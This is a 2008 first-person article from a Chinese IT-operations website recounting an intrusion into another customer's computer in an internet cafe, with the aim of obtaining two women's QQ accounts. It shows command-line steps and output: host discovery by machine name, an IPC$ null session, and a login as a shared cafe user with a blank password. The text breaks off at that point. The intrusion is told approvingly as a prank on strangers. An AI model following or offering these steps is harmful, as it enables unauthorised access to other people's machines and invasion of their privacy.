IT运维管理,创造商业价值!
中国IT运维网首页 | 资讯中心 | 运维管理 | 信息安全 | CIO视界 | 云计算 | 最佳案例 | 运维资源 | 专题策划 | 知识库 | 论坛

实战经验:网吧入侵过程全方位剖析

2008年11月14日
/

好久都没来网吧了,今天一朋友来找我。外面有下着雪,实在没地方玩,又给溜进了网吧……

在以前家里没买电脑时。整天都泡这网吧,所以对他的系统设置什么还了解点,都大半年没来了……不知道有啥变化……

这网吧还不错.别的网吧都是无盘的或者就是98的.这里98和2000都有,呵.,搞入侵可方便了……

无意的看到13号坐着两MM,嘻.……入侵也由此开始了,看能不能拿到MM的QQ号……偶也找了一2000系统的机器做下,(偶找了一角落.呵.

这样比较安全点..)

打开偶可爱的CMD..先net name下看看本机情况

WANGLU05

USER2000

命令成功完成。

我本机名是WANGLU05.ping下看看IP有无什么规则

 Pinging wanglu05 [192.168.0.13] with 32 bytes of data:

Reply from 192.168.0.13: bytes=32 time<10ms TTL=64

Reply from 192.168.0.13: bytes=32 time<10ms TTL=64

Reply from 192.168.0.13: bytes=32 time<10ms TTL=64

Reply from 192.168.0.13: bytes=32 time<10ms TTL=64

IP是改了.记的以前是有一种规则的.比如我5号把.内网IP就是192.168.0.5.

这次MM在13号..IP就不能猜了...不过网吧机器名可是一样的...有路了.

Pinging WANGLU13 [192.168.0.225] with 32 bytes of data:

Reply from 192.168.0.225: bytes=32 time<10ms TTL=128

Reply from 192.168.0.225: bytes=32 time<10ms TTL=128

Reply from 192.168.0.225: bytes=32 time<10ms TTL=128

得到内网IP是192.168.0.225...偶记的以前是存在默认共享的..这次换了网管不知道他有没做防范措施....从这入手....

net use //192.168.0.225/ipc$ "" /user:"" 空连接成功..说明ipc$默认共享还在...

只是没权限...网吧的登陆用户全是一样的.而且密码为空.又让我给钻了空子.

G:/&gt;net use //192.168.0.225/ipc$ "" /user:"user04"

命令成功完成。


发表评论请到:http://bbs.cnitom.com

相关阅读

图文热点

Power架构产品创新 IBM推动其本土化发展
Power架构产品创新 IBM推动其本土化发展自从1990年,IBM推出基于RISC系统的新产品线RS/6000(现称eServer p系列)之后,...
WAF:高校Web应用安全守护者
WAF:高校Web应用安全守护者最近几年高校网站被攻击的事件时有发生,造成了不良影响,因此越来越多的高校开始...

本类热点